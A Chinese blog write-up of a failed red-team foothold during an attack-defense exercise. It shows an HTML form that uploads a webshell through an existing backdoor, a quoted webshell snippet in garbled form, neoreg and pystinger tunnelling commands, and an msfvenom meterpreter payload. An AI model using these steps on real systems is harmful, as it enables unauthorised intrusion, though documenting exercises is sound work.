记一次失败的打点

简介: 记一次失败的打点

背景


在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。


上传webshell


在web目录发现了一个已存在木马xx.jsp


<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>

利用已经存在的上传后门,构建一个html表单来上传我们的自己木马


<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp" method="post">      <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>    <input type=submit value="提交">  </form>

目标不出网,无法外联


neoreg


还原大致流程


生成neoreg


py -2 neoreg.py generate -k password


上传&验证


py -2 neoreg.py -k password -u http://192.168.11.132/3.php`

msf上线


msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=9001 -f exe -o reverse.exe

gedit /etc/proxychains4.conf


bd96902dccc9a0c18951361d921ad0be_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



proxychains4 msfconsole


97ab06f717b7f44c95119465262494fe_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


0458455f8bbc5b2342e6870ddcfb0b53_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


CS上线

pystinger


蚁剑上传proxy.phpstinger_server.exe并执行  start stinger_server.exe



攻击机执行


stinger_client.exe -w http://192.168.11.132/proxy.php -l 127.0.0.1 -p 60000


9013c3ca539d454049c855ae346f3ad2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


设置监听


2ea055c423a37255c418e141845493cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


上线


2ed2eaf610386f206137f593df9085cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



结束语


最后不幸被蓝队发现,痛失权限,打点失败。


目录
打赏
0
0
0
0
14
分享
相关文章
通过日志定位分析接口调用缓慢的原因
最近我们的接口中有两个被调用的时候比较缓慢,一个查询大概需要2-3秒的样子,我们需要定位一下具体需要的时间秒数,就让某猿过去实现了。提交代码我review的时候我吓了一跳,那那两个类进行了手动统计时间,代码就不贴了,这样十分不好啊,如果以后要统计其他的controller或者service那就得手动...
1287 0
Flink实现实时异常登陆监控(两秒内多次登陆失败进行异常行为标记)
Flink实现实时异常登陆监控(两秒内多次登陆失败进行异常行为标记)
153 1
FeignClient打印请求失败的日志,打印所有feignCliet接口请求失败的错误日志,方便排查原因
FeignClient打印请求失败的日志,打印所有feignCliet接口请求失败的错误日志,方便排查原因
295 0
日志服务中采集k8s时心跳失败基本排查
本文主要针对k8s向日志服务上传日志时,机器组心跳FAIL、或者没有出现IP的问题进行排查。
838 0
使用异步事件在后台进行计算并报告进度
演练:实现一个使用后台操作的窗体 Visual Studio 2010     其他版本     此主题尚未评级 - 评价此主题     如果某项操作需要很长的时间才能完成,并且不希望用户界面 (UI) 停止响应或“挂起”,则可以使用 BackgroundWorker 类在另一个线程中执行这种操作。
1059 0
异步任务处理系统问题之自动重试是如何在Level 3的系统中实现的问题如何解决
异步任务处理系统问题之自动重试是如何在Level 3的系统中实现的问题如何解决